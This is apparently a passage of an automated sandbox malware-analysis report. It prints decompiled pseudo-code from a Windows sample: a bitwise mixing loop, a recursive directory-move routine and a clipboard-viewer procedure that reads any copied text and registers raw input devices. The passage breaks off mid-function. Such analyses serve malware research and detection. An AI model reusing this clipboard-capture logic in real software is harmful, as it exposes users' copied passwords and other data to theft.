                                                                                  						 *(_t2149 - 8) =  *(_t1508 + _t1861 * 8 - 0xa8) &  *(_t2109 + _t1678 * 8 - 0x1c8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1508 + _t1861 * 8 - 0xa4) &  *(_t2109 + _t1678 * 8 - 0x1c4) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1681 =  *(_t2149 - 0xc);
                                                                                  						_t2110 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2110 + 0x50 + _t1681 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2110 + 0x54 + _t1681 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1682 =  *(_t2149 - 0xc);
                                                                                  						_t1870 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1870 + _t1682 * 8 - 0x270);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1870 + _t1682 * 8 - 0x26c);
                                                                                  						_t1683 =  *(_t2149 - 0xc);
                                                                                  						_t1871 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1871 + _t1683 * 8 - 0x30);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1871 + _t1683 * 8 - 0x2c);
                                                                                  						_t1684 =  *(_t2149 - 0xc);
                                                                                  						_t1872 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1518 =  *(_t2149 - 0xc);
                                                                                  						_t2115 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1872 + _t1684 * 8 - 0x38) &  *(_t2115 + _t1518 * 8 - 0x50) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1872 + _t1684 * 8 - 0x34) &  *(_t2115 + _t1518 * 8 - 0x4c) ^  *(_t2149 - 4);
                                                                                  						_t1873 =  *(_t2149 - 0xc);
                                                                                  						_t1519 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1688 =  *(_t2149 - 0xc);
                                                                                  						_t2116 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1519 + _t1873 * 8 - 0xa0) &  *(_t2116 + _t1688 * 8 - 0x1c0) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1519 + _t1873 * 8 - 0x9c) &  *(_t2116 + _t1688 * 8 - 0x1bc) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1691 =  *(_t2149 - 0xc);
                                                                                  						_t2117 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2117 + 0x58 + _t1691 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2117 + 0x5c + _t1691 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1692 =  *(_t2149 - 0xc);
                                                                                  						_t1882 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1882 + _t1692 * 8 - 0x268);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1882 + _t1692 * 8 - 0x264);
                                                                                  						_t1693 =  *(_t2149 - 0xc);
                                                                                  						_t1883 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1883 + _t1693 * 8 - 0x28);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1883 + _t1693 * 8 - 0x24);
                                                                                  						_t1694 =  *(_t2149 - 0xc);
                                                                                  						_t1884 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1529 =  *(_t2149 - 0xc);
                                                                                  						_t2122 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1884 + _t1694 * 8 - 0x30) &  *(_t2122 + _t1529 * 8 - 0x48) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1884 + _t1694 * 8 - 0x2c) &  *(_t2122 + _t1529 * 8 - 0x44) ^  *(_t2149 - 4);
                                                                                  						_t1885 =  *(_t2149 - 0xc);
                                                                                  						_t1530 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1698 =  *(_t2149 - 0xc);
                                                                                  						_t2123 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1530 + _t1885 * 8 - 0x98) &  *(_t2123 + _t1698 * 8 - 0x1b8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1530 + _t1885 * 8 - 0x94) &  *(_t2123 + _t1698 * 8 - 0x1b4) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1701 =  *(_t2149 - 0xc);
                                                                                  						_t2124 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2124 + 0x60 + _t1701 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2124 + 0x64 + _t1701 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1702 =  *(_t2149 - 0xc);
                                                                                  						_t1894 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1894 + _t1702 * 8 - 0x260);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1894 + _t1702 * 8 - 0x25c);
                                                                                  						_t1703 =  *(_t2149 - 0xc);
                                                                                  						_t1895 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1895 + _t1703 * 8 - 0x20);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1895 + _t1703 * 8 - 0x1c);
                                                                                  						_t1704 =  *(_t2149 - 0xc);
                                                                                  						_t1896 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1540 =  *(_t2149 - 0xc);
                                                                                  						_t2129 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1896 + _t1704 * 8 - 0x28) &  *(_t2129 + _t1540 * 8 - 0x40) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1896 + _t1704 * 8 - 0x24) &  *(_t2129 + _t1540 * 8 - 0x3c) ^  *(_t2149 - 4);
                                                                                  						_t1897 =  *(_t2149 - 0xc);
                                                                                  						_t1541 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1708 =  *(_t2149 - 0xc);
                                                                                  						_t2130 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1541 + _t1897 * 8 - 0x90) &  *(_t2130 + _t1708 * 8 - 0x1b0) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1541 + _t1897 * 8 - 0x8c) &  *(_t2130 + _t1708 * 8 - 0x1ac) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1711 =  *(_t2149 - 0xc);
                                                                                  						_t2131 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2131 + 0x68 + _t1711 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2131 + 0x6c + _t1711 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1712 =  *(_t2149 - 0xc);
                                                                                  						_t1906 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1906 + _t1712 * 8 - 0x258);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1906 + _t1712 * 8 - 0x254);
                                                                                  						_t1713 =  *(_t2149 - 0xc);
                                                                                  						_t1907 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1907 + _t1713 * 8 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1907 + _t1713 * 8 - 0x14);
                                                                                  						_t1714 =  *(_t2149 - 0xc);
                                                                                  						_t1908 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1551 =  *(_t2149 - 0xc);
                                                                                  						_t2136 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1908 + _t1714 * 8 - 0x20) &  *(_t2136 + _t1551 * 8 - 0x38) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1908 + _t1714 * 8 - 0x1c) &  *(_t2136 + _t1551 * 8 - 0x34) ^  *(_t2149 - 4);
                                                                                  						_t1909 =  *(_t2149 - 0xc);
                                                                                  						_t1552 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1718 =  *(_t2149 - 0xc);
                                                                                  						_t2137 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1552 + _t1909 * 8 - 0x88) &  *(_t2137 + _t1718 * 8 - 0x1a8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1552 + _t1909 * 8 - 0x84) &  *(_t2137 + _t1718 * 8 - 0x1a4) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1721 =  *(_t2149 - 0xc);
                                                                                  						_t2138 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2138 + 0x70 + _t1721 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2138 + 0x74 + _t1721 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1722 =  *(_t2149 - 0xc);
                                                                                  						_t1918 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1918 + _t1722 * 8 - 0x250);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1918 + _t1722 * 8 - 0x24c);
                                                                                  						_t1723 =  *(_t2149 - 0xc);
                                                                                  						_t1919 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1919 + _t1723 * 8 - 0x10);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1919 + _t1723 * 8 - 0xc);
                                                                                  						_t1724 =  *(_t2149 - 0xc);
                                                                                  						_t1920 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1562 =  *(_t2149 - 0xc);
                                                                                  						_t2143 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1920 + _t1724 * 8 - 0x18) &  *(_t2143 + _t1562 * 8 - 0x30) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1920 + _t1724 * 8 - 0x14) &  *(_t2143 + _t1562 * 8 - 0x2c) ^  *(_t2149 - 4);
                                                                                  						_t1921 =  *(_t2149 - 0xc);
                                                                                  						_t1563 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1728 =  *(_t2149 - 0xc);
                                                                                  						_t2144 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1563 + _t1921 * 8 - 0x80) &  *(_t2144 + _t1728 * 8 - 0x1a0) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1563 + _t1921 * 8 - 0x7c) &  *(_t2144 + _t1728 * 8 - 0x19c) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1731 =  *(_t2149 - 0xc);
                                                                                  						_t2145 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2145 + 0x78 + _t1731 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2145 + 0x7c + _t1731 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						L0040F198();
                                                                                  						_t1391 =  *(_t2149 - 0x14) &  *0x411134;
                                                                                  						 *(_t2149 - 0x18) =  *(_t2149 - 0x18) ^  *(_t2149 - 0x18) ^  *(_t2149 - 0x18) &  *0x411130;
                                                                                  						 *(_t2149 - 0x14) =  *(_t2149 - 0x14) ^  *(_t2149 - 0x14) ^  *(_t2149 - 0x14) &  *0x411134;
                                                                                  						 *(_t2149 - 0xc) =  *(_t2149 - 0xc) + 0x10;
                                                                                  						continue;
                                                                                  					}
                                                                                  					L3:
                                                                                  					return _t1391;
                                                                                  					L4:
                                                                                  				}
                                                                                  			}
                                                                                  0x004073f7
                                                                                  0x00407402
                                                                                  0x00407405
                                                                                  0x00407408
                                                                                  0x0040740c
                                                                                  0x00407413
                                                                                  0x00407419
                                                                                  0x0040741c
                                                                                  0x0040741f
                                                                                  0x00407436
                                                                                  0x00407439
                                                                                  0x0040743c
                                                                                  0x0040743f
                                                                                  0x00407450
                                                                                  0x00407453
                                                                                  0x00407456
                                                                                  0x00407459
                                                                                  0x0040745c
                                                                                  0x0040745f
                                                                                  0x00407478
                                                                                  0x0040747b
                                                                                  0x0040747e
                                                                                  0x00407481
                                                                                  0x00407484
                                                                                  0x00407487
                                                                                  0x004074ac
                                                                                  0x004074af
                                                                                  0x004074ba
                                                                                  0x004074c5
                                                                                  0x004074c8
                                                                                  0x004074d3
                                                                                  0x004074de
                                                                                  0x004074e1
                                                                                  0x004074e4
                                                                                  0x004074e8
                                                                                  0x004074ef
                                                                                  0x004074f5
                                                                                  0x004074f8
                                                                                  0x004074fb
                                                                                  0x00407512
                                                                                  0x00407515
                                                                                  0x00407518
                                                                                  0x0040751b
                                                                                  0x0040752c
                                                                                  0x0040752f
                                                                                  0x00407532
                                                                                  0x00407535
                                                                                  0x00407538
                                                                                  0x0040753b
                                                                                  0x00407554
                                                                                  0x00407557
                                                                                  0x0040755a
                                                                                  0x0040755d
                                                                                  0x00407560
                                                                                  0x00407563
                                                                                  0x00407588
                                                                                  0x0040758b
                                                                                  0x00407596
                                                                                  0x004075a1
                                                                                  0x004075a4
                                                                                  0x004075af
                                                                                  0x004075ba
                                                                                  0x004075bd
                                                                                  0x004075c0
                                                                                  0x004075c4
                                                                                  0x004075cb
                                                                                  0x004075d1
                                                                                  0x004075d4
                                                                                  0x004075d7
                                                                                  0x004075ee
                                                                                  0x004075f1
                                                                                  0x004075f4
                                                                                  0x004075f7
                                                                                  0x00407608
                                                                                  0x0040760b
                                                                                  0x0040760e
                                                                                  0x00407611
                                                                                  0x00407614
                                                                                  0x00407617
                                                                                  0x00407630
                                                                                  0x00407633
                                                                                  0x00407636
                                                                                  0x00407639
                                                                                  0x0040763c
                                                                                  0x0040763f
                                                                                  0x00407664
                                                                                  0x00407667
                                                                                  0x00407672
                                                                                  0x0040767d
                                                                                  0x00407680
                                                                                  0x0040768b
                                                                                  0x00407696
                                                                                  0x00407699
                                                                                  0x0040769c
                                                                                  0x004076a0
                                                                                  0x004076a7
                                                                                  0x004076ad
                                                                                  0x004076b0
                                                                                  0x004076b3
                                                                                  0x004076ca
                                                                                  0x004076cd
                                                                                  0x004076d0
                                                                                  0x004076d3
                                                                                  0x004076e4
                                                                                  0x004076e7
                                                                                  0x004076ea
                                                                                  0x004076ed
                                                                                  0x004076f0
                                                                                  0x004076f3
                                                                                  0x0040770c
                                                                                  0x0040770f
                                                                                  0x00407712
                                                                                  0x00407715
                                                                                  0x00407718
                                                                                  0x0040771b
                                                                                  0x0040773a
                                                                                  0x0040773d
                                                                                  0x00407748
                                                                                  0x00407753
                                                                                  0x00407756
                                                                                  0x00407761
                                                                                  0x0040776c
                                                                                  0x0040776f
                                                                                  0x00407772
                                                                                  0x00407776
                                                                                  0x00407782
                                                                                  0x00407793
                                                                                  0x004077a8
                                                                                  0x004077b2
                                                                                  0x004077b5
                                                                                  0x004077be
                                                                                  0x00000000
                                                                                  0x004077be
                                                                                  0x004077c6
                                                                                  0x004077cb
                                                                                  0x00000000
                                                                                  0x004077cb

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _allshl_aullshr
                                                                                  • String ID:
                                                                                  • API String ID: 673498613-0
                                                                                  • Opcode ID: baaf79d8cfe51c2f24e4720d5aa813661035a3ea984344c320599f23fcf2e78b
                                                                                  • Instruction ID: 342a6486b9e8001f08a7bf27c7bc9eacaf831c291761ffc9c0f51bc504639bdc
                                                                                  • Opcode Fuzzy Hash: baaf79d8cfe51c2f24e4720d5aa813661035a3ea984344c320599f23fcf2e78b
                                                                                  • Instruction Fuzzy Hash: 17D22D79D11619EFCB54CF99C18099EFBF1FF88320F62859A9845AB305C630AE95DF80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 434 404a90-404adf CreateDirectoryW wsprintfW FindFirstFileW 435 404ae5-404af9 lstrcmpW 434->435 436 404bbf-404bc2 434->436 437 404b11 435->437 438 404afb-404b0f lstrcmpW 435->438 440 404b8c-404ba2 FindNextFileW 437->440 438->437 439 404b13-404b5c wsprintfW * 2 438->439 441 404b76-404b86 MoveFileExW 439->441 442 404b5e-404b74 call 404a90 439->442 440->435 443 404ba8-404bb9 FindClose RemoveDirectoryW 440->443 441->440 442->440 443->436
                                                                                  C-Code - Quality: 100%
                                                                                  			E00404A90(WCHAR* _a4, char _a8) {
                                                                                  				short _v524;
                                                                                  				struct _WIN32_FIND_DATAW _v1116;
                                                                                  				void* _v1120;
                                                                                  				short _v1644;
                                                                                  				short _v2164;
                                                                                  				void* _t29;
                                                                                  				void* _t60;
                                                                                  				void* _t61;
                                                                                  
                                                                                  				_t1 =  &_a8; // 0x40505b
                                                                                  				CreateDirectoryW( *_t1, 0);
                                                                                  				wsprintfW( &_v524, L"%s\\*", _a4);
                                                                                  				_t61 = _t60 + 0xc;
                                                                                  				_t29 = FindFirstFileW( &_v524,  &_v1116);
                                                                                  				_v1120 = _t29;
                                                                                  				if(_v1120 == 0xffffffff) {
                                                                                  					return _t29;
                                                                                  				} else {
                                                                                  					goto L1;
                                                                                  				}
                                                                                  				do {
                                                                                  					L1:
                                                                                  					if(lstrcmpW( &(_v1116.cFileName), ".") != 0 && lstrcmpW( &(_v1116.cFileName), L"..") != 0) {
                                                                                  						wsprintfW( &_v1644, L"%s\\%s", _a4,  &(_v1116.cFileName));
                                                                                  						_t14 =  &_a8; // 0x40505b
                                                                                  						wsprintfW( &_v2164, L"%s\\%s",  *_t14,  &(_v1116.cFileName));
                                                                                  						_t61 = _t61 + 0x20;
                                                                                  						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
                                                                                  							MoveFileExW( &_v1644,  &_v2164, 9);
                                                                                  						} else {
                                                                                  							E00404A90( &_v1644,  &_v2164);
                                                                                  							_t61 = _t61 + 8;
                                                                                  						}
                                                                                  					}
                                                                                  				} while (FindNextFileW(_v1120,  &_v1116) != 0);
                                                                                  				FindClose(_v1120);
                                                                                  				return RemoveDirectoryW(_a4);
                                                                                  			}
                                                                                  0x00404a9b
                                                                                  0x00404a9f
                                                                                  0x00404ab5
                                                                                  0x00404abb
                                                                                  0x00404acc
                                                                                  0x00404ad2
                                                                                  0x00404adf
                                                                                  0x00404bc2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404ae5
                                                                                  0x00404ae5
                                                                                  0x00404af9
                                                                                  0x00404b2a
                                                                                  0x00404b3a
                                                                                  0x00404b4a
                                                                                  0x00404b50
                                                                                  0x00404b5c
                                                                                  0x00404b86
                                                                                  0x00404b5e
                                                                                  0x00404b6c
                                                                                  0x00404b71
                                                                                  0x00404b71
                                                                                  0x00404b5c
                                                                                  0x00404ba0
                                                                                  0x00404baf
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNEL32([P@,00000000), ref: 00404A9F
                                                                                  • wsprintfW.USER32 ref: 00404AB5
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00404ACC
                                                                                  • lstrcmpW.KERNEL32(?,00411594), ref: 00404AF1
                                                                                  • lstrcmpW.KERNEL32(?,00411598), ref: 00404B07
                                                                                  • wsprintfW.USER32 ref: 00404B2A
                                                                                  • wsprintfW.USER32 ref: 00404B4A
                                                                                  • MoveFileExW.KERNEL32(?,?,00000009), ref: 00404B86
                                                                                  • FindNextFileW.KERNEL32(000000FF,?), ref: 00404B9A
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00404BAF
                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00404BB9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                  • String ID: %s\%s$%s\%s$%s\*$[P@
                                                                                  • API String ID: 92872011-505645206
                                                                                  • Opcode ID: b47613f4efcc78fc372a5197ceb720a83a34bcc65ffc30f7c0cf28f594637780
                                                                                  • Instruction ID: 4312a352e9e7f9f4b9df3eadcbdfd99b35f9a62cedde5f9254868b67503f5fd5
                                                                                  • Opcode Fuzzy Hash: b47613f4efcc78fc372a5197ceb720a83a34bcc65ffc30f7c0cf28f594637780
                                                                                  • Instruction Fuzzy Hash: 5D3178B5900218ABCB10DBA0DC88FEA7778AB88311F40C599F709A7155DB75EAC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 446 403db0-403dd2 GetWindowLongW 447 403dd4-403ddb 446->447 448 403df6-403dfd 446->448 449 403de1-403de5 447->449 450 403e67-403e78 IsClipboardFormatAvailable 447->450 451 403e26-403e2c 448->451 452 403dff 448->452 455 403e04-403e21 SetClipboardViewer SetWindowLongW 449->455 456 403de7-403deb 449->456 453 403e83-403e8d IsClipboardFormatAvailable 450->453 454 403e7a-403e81 450->454 458 403e46-403e4a 451->458 459 403e2e-403e44 SetWindowLongW 451->459 457 403fe4-403ffd DefWindowProcA 452->457 461 403e98-403ea2 IsClipboardFormatAvailable 453->461 462 403e8f-403e96 453->462 460 403eab-403eaf 454->460 455->457 463 403df1 456->463 464 403f9d-403fde RegisterRawInputDevices ChangeClipboardChain 456->464 465 403e62 458->465 466 403e4c-403e5c SendMessageA 458->466 459->465 468 403eb5-403ebf OpenClipboard 460->468 469 403f7f-403f83 460->469 461->460 467 403ea4 461->467 462->460 463->457 464->457 465->457 466->465 467->460 468->469 472 403ec5-403ed6 GetClipboardData 468->472 470 403f85-403f95 SendMessageA 469->470 471 403f9b 469->471 470->471 471->457 473 403ed8 472->473 474 403edd-403eee GlobalLock 472->474 473->457 475 403ef0 474->475 476 403ef5-403f06 474->476 475->457 477 403f08-403f0c 476->477 478 403f29-403f3c call 40b570 476->478 480 403f3e-403f4e call 403ce0 477->480 481 403f0e-403f12 477->481 486 403f51-403f65 GlobalUnlock CloseClipboard 478->486 480->486 482 403f14 481->482 483 403f16-403f27 call 403bd0 481->483 482->486 483->486 486->469 490 403f67-403f7c call 403480 call 408fb0 486->490 490->469
                                                                                  C-Code - Quality: 94%
E00403DB0(struct HWND__* _a4, int _a8, int _a12, struct HWND__* _a16) {
    /* Window procedure of the sample's clipboard-viewer window.
       Arguments are the usual hwnd (_a4), uMsg (_a8), wParam (_a12), lParam (_a16). */
    struct HWND__* _v8;        /* next window in the clipboard viewer chain */
    int _v12;                  /* clipboard format chosen for this notification */
    struct HWND__* _v16;       /* buffer returned by the conversion helpers (decompiler typed it as HWND) */
    void* _v20;                /* GlobalLock() pointer to the clipboard text */
    void* _v24;                /* HGLOBAL from GetClipboardData() */
    short _v26;
    short _v30;
    int _v32;                  /* RAWINPUTDEVICE.dwFlags */
    short _v34;                /* RAWINPUTDEVICE.usUsage */
    char _v36;                 /* RAWINPUTDEVICE.usUsagePage (low byte) */
    int _v40;                  /* copy of uMsg */
    int _v44;                  /* copy of the chosen format */
    struct HWND__* _t90;
    struct HWND__* _t97;
    struct HWND__* _t98;
    void* _t129;

    /* 0xffffffeb is -21, i.e. GWL_USERDATA: the next viewer's HWND is kept in the window's user data. */
    _v8 = GetWindowLongW(_a4, 0xffffffeb);
    _v40 = _a8;
    if(_v40 > 0x308) {
        if(_v40 == 0x30d) {                       /* WM_CHANGECBCHAIN: a viewer left the chain */
            if(_a12 != _v8) {                     /* wParam is not our successor: pass the message down the chain */
                if(_v8 != 0) {
                    SendMessageA(_v8, _a8, _a12, _a16);
                }
            } else {                              /* our successor is leaving: lParam is its successor */
                _v8 = _a16;
                SetWindowLongW(_a4, 0xffffffeb, _v8);
            }
            goto L38;
        } else {
            L38:
            return DefWindowProcA(_a4, _a8, _a12, _a16);
        }
    }
    if(_v40 == 0x308) {                           /* WM_DRAWCLIPBOARD: clipboard contents changed */
        _v12 = 0;
        /* Text format preference: CF_UNICODETEXT (0xd), then CF_TEXT (1), then CF_OEMTEXT (7). */
        if(IsClipboardFormatAvailable(0xd) == 0) {
            if(IsClipboardFormatAvailable(1) == 0) {
                if(IsClipboardFormatAvailable(7) != 0) {
                    _v12 = 7;
                }
            } else {
                _v12 = 1;
            }
        } else {
            _v12 = 0xd;
        }
        if(_v12 == 0 || OpenClipboard(0) == 0) {  /* no text on the clipboard, or it is held by someone else: only forward */
            L34:
            /* The notification is passed on, so viewers further down the chain keep working. */
            if(_v8 != 0) {
                SendMessageA(_v8, _a8, _a12, _a16);
            }
        } else {
            _v24 = GetClipboardData(_v12);
            if(_v24 != 0) {
                _v20 = GlobalLock(_v24);
                if(_v20 != 0) {
                    _v16 = 0;
                    _v44 = _v12;
                    /* One helper per format copies or converts the text into a new buffer (bodies not in this section). */
                    if(_v44 == 1) {                       /* CF_TEXT */
                        _t90 = E0040B570(_v20, 0, 0);
                        _t129 = _t129 + 0xc;
                        _v16 = _t90;
                    } else {
                        if(_v44 == 7) {                   /* CF_OEMTEXT */
                            _t97 = E00403CE0(_v20, 0, 0);
                            _t129 = _t129 + 0xc;
                            _v16 = _t97;
                        } else {
                            if(_v44 == 0xd) {             /* CF_UNICODETEXT */
                                _t98 = E00403BD0(_v20, _v20, 0);
